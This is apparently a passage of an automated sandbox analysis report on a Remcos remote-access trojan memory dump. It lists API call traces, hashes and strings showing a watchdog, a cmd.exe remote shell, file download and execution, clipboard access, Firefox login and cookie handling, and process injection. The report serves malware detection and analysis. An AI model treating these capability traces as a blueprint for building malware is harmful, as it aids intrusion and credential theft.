                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                          • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                          • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                          • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __alldvrm
                          • String ID:
                          • API String ID: 65215352-0
                          • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                          • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                          • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                          • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                          • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                          • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                          • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                          APIs
                          • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Startup
                          • String ID:
                          • API String ID: 724789610-0
                          • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                          • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                          • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                          • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                          APIs
                          • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: FromGdipImageLoadStream
                          • String ID:
                          • API String ID: 3292405956-0
                          • Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                          • Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
                          • Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                          • Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
                          APIs
                          • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: GdipImageSaveStream
                          • String ID:
                          • API String ID: 971487142-0
                          • Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                          • Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
                          • Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                          • Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
                          APIs
                          • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateThread
                          • String ID:
                          • API String ID: 2422867632-0
                          • Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                          • Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
                          • Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                          • Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
                          APIs
                          • std::_Deallocate.LIBCONCRT ref: 00402E2B
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Deallocatestd::_
                          • String ID:
                          • API String ID: 1323251999-0
                          • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                          • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                          • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                          • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: recv
                          • String ID:
                          • API String ID: 1507349165-0
                          • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                          • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                          • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                          • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                          APIs
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: send
                          • String ID:
                          • API String ID: 2809346765-0
                          • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                          • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                          • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                          • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                          APIs
                          • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DisposeGdipImage
                          • String ID:
                          • API String ID: 1024088383-0
                          • Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                          • Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
                          • Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                          • Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
                          APIs
                          • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                          • Instruction ID: 079a7b638a28e99b338f4493b6ebfa8105bff269478f0661155a893ef6bf0f7e
                          • Opcode Fuzzy Hash: 419aedcff02c784107df6911406269fb4724b8c0c47efc41c654e3b285a5c19f
                          • Instruction Fuzzy Hash: 13B00872418382EBCF02DF90DD0492ABAB2BB88741F184C5CB2A14107187228428EB06
                          APIs
                          • SetEvent.KERNEL32(?,?), ref: 00407CF4
                          • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00407DC2
                          • DeleteFileW.KERNEL32(00000000), ref: 00407DE4
                            • Part of subcall function 0041C322: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C37D
                            • Part of subcall function 0041C322: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C3AD
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C402
                            • Part of subcall function 0041C322: FindClose.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C463
                            • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,`.|,004752F0,00000001), ref: 0041C46A
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                            • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                            • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 004081D2
                          • GetLogicalDriveStringsA.KERNEL32 ref: 004082B3
                          • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 004084FF
                          • DeleteFileA.KERNEL32(?), ref: 0040868D
                            • Part of subcall function 00408847: __EH_prolog.LIBCMT ref: 0040884C
                            • Part of subcall function 00408847: FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                            • Part of subcall function 00408847: __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                            • Part of subcall function 00408847: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                          • Sleep.KERNEL32(000007D0), ref: 00408733
                          • StrToIntA.SHLWAPI(00000000), ref: 00408775
                            • Part of subcall function 0041CA73: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Find$AttributesDeleteDirectoryEventFirstNextRemove$CloseDriveException@8ExecuteH_prologInfoLocalLogicalObjectParametersShellSingleSleepStringsSystemThrowTimeWaitsend
                          • String ID: (PG$Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$XPG$XPG$XPG$XPG$open$NG
                          • API String ID: 1067849700-181434739
                          • Opcode ID: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                          • Instruction ID: f533dcafa702064eae222fc9ff54aa9327b172b3479e3db69e1c842a3252ef64
                          • Opcode Fuzzy Hash: 8f9230baec0eb1e52dbeff348466e26c4dcfe8dee4ab33f0bd5d19348bcac538
                          • Instruction Fuzzy Hash: F04293716043016BC604FB76C9579AE77A9AF91348F80483FF542671E2EF7C9908879B
                          APIs
                          • __Init_thread_footer.LIBCMT ref: 004056E6
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          • __Init_thread_footer.LIBCMT ref: 00405723
                          • CreatePipe.KERNEL32(00476CCC,00476CB4,00476BD8,00000000,004660CC,00000000), ref: 004057B6
                          • CreatePipe.KERNEL32(00476CB8,00476CD4,00476BD8,00000000), ref: 004057CC
                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00476BE8,00476CBC), ref: 0040583F
                          • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405897
                          • PeekNamedPipe.KERNEL32 ref: 004058BC
                          • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058E9
                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                          • WriteFile.KERNEL32(00000000,00000000,?,00000000,00474F90), ref: 004059E4
                          • Sleep.KERNEL32(00000064,00000062,004660B4), ref: 004059FE
                          • TerminateProcess.KERNEL32(00000000), ref: 00405A17
                          • CloseHandle.KERNEL32 ref: 00405A23
                          • CloseHandle.KERNEL32 ref: 00405A2B
                          • CloseHandle.KERNEL32 ref: 00405A3D
                          • CloseHandle.KERNEL32 ref: 00405A45
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                          • String ID: 0lG$0lG$0lG$0lG$0lG$SystemDrive$cmd.exe$kG
                          • API String ID: 2994406822-18413064
                          • Opcode ID: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                          • Instruction ID: feb7c3e087fbbfe745e3798ef664df189eb35a760580a6c3fca7c2e5343dee52
                          • Opcode Fuzzy Hash: 3bf44ab92ff2caae0b3eb6e784b73306b892efe8c499cead9e04a1f7096e9acc
                          • Instruction Fuzzy Hash: 1A91C271604604AFD711FB36ED42A6B369AEB84308F01443FF589A62E2DB7D9C448F6D
                          APIs
                          • GetCurrentProcessId.KERNEL32 ref: 00412141
                            • Part of subcall function 004138B2: RegCreateKeyA.ADVAPI32(80000001,00000000,004660B4), ref: 004138C0
                            • Part of subcall function 004138B2: RegSetValueExA.KERNEL32(004660B4,000000AF,00000000,00000004,00000001,00000004), ref: 004138DB
                            • Part of subcall function 004138B2: RegCloseKey.KERNEL32(004660B4), ref: 004138E6
                          • OpenMutexA.KERNEL32 ref: 00412181
                          • CloseHandle.KERNEL32(00000000), ref: 00412190
                          • CreateThread.KERNEL32(00000000,00000000,00412829,00000000,00000000,00000000), ref: 004121E6
                          • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                          • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$`.|$fsutil.exe$rmclient.exe$svchost.exe
                          • API String ID: 3018269243-3594870333
                          • Opcode ID: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                          • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                          • Opcode Fuzzy Hash: a1d17eaa79687276733ec66dbf34ac3729f4deb925ccc61b392e9011f6d934ea
                          • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                          • FindClose.KERNEL32(00000000), ref: 0040BC04
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                          • FindClose.KERNEL32(00000000), ref: 0040BD4D
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$CloseFile$FirstNext
                          • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                          • API String ID: 1164774033-3681987949
                          • Opcode ID: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                          • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                          • Opcode Fuzzy Hash: ddf3ae28b5732d4bdf30ea22351dc37fdb7451648e085e9b91ca2b4f61ea912e
                          • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                          APIs
                          • OpenClipboard.USER32 ref: 004168FD
                          • EmptyClipboard.USER32 ref: 0041690B
                          • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                          • GlobalLock.KERNEL32(00000000), ref: 00416934
                          • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                          • CloseClipboard.USER32 ref: 00416990
                          • OpenClipboard.USER32 ref: 00416997
                          • GetClipboardData.USER32 ref: 004169A7
                          • GlobalLock.KERNEL32(00000000), ref: 004169B0
                          • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                          • CloseClipboard.USER32 ref: 004169BF
                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                          • String ID: !D@
                          • API String ID: 3520204547-604454484
                          • Opcode ID: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                          • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                          • Opcode Fuzzy Hash: bf5a65ac99ffe61d9797845c90f3a5bbf17482b58dee495671916681c2117e8d
                          • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                          APIs
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                          • FindClose.KERNEL32(00000000), ref: 0040BE04
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                          • FindClose.KERNEL32(00000000), ref: 0040BEEA
                          • FindClose.KERNEL32(00000000), ref: 0040BF0B
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                          • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: Find$Close$File$FirstNext
                          • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                          • API String ID: 3527384056-432212279
                          • Opcode ID: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                          • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                          • Opcode Fuzzy Hash: efd911169634aa6eb296d91244de5f42230bb67941264acd6522b2be9cf9de9e
                          • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4F4
                          • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                          • CloseHandle.KERNEL32(00000000), ref: 0040F59E
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                            • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                          • CloseHandle.KERNEL32(00000000), ref: 0040F6A9
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                          • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$`.|$ieinstal.exe$ielowutil.exe
                          • API String ID: 3756808967-2914824049
                          • Opcode ID: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                          • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                          • Opcode Fuzzy Hash: 4c1678c020118b3bcda45d43f08c867fc8f180d6921f39041d9cab00d7c74641
                          • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                          APIs
                          • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413452
                          • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413460
                          • GetFileSize.KERNEL32(?,00000000), ref: 0041346D
                          • UnmapViewOfFile.KERNEL32(00000000), ref: 0041348D
                          • CloseHandle.KERNEL32(00000000), ref: 0041349A
                          • CloseHandle.KERNEL32(?), ref: 004134A0
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                          • String ID:
                          • API String ID: 297527592-0
                          • Opcode ID: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                          • Instruction ID: 84c8eec30da1abd4ec43dfc3561b6153623c17c5959ee0fa3a13cc5c00e14cc2
                          • Opcode Fuzzy Hash: f8cfc853885fc8b29f950af92ed283b35790545d66a1b0f015cadf1906342396
                          • Instruction Fuzzy Hash: F041F331104301BBD7119F25EC49F6B3BACEFC9769F10052EF655D21A2DB38DA40866E
                          Strings
                          Memory Dump Source
                          • Source File: 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                           • Associated: 00000009.00000002.884353898.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                           • Associated: 00000009.00000002.884353898.0000000000478000.00000040.00000400.00020000.00000000.sdmp
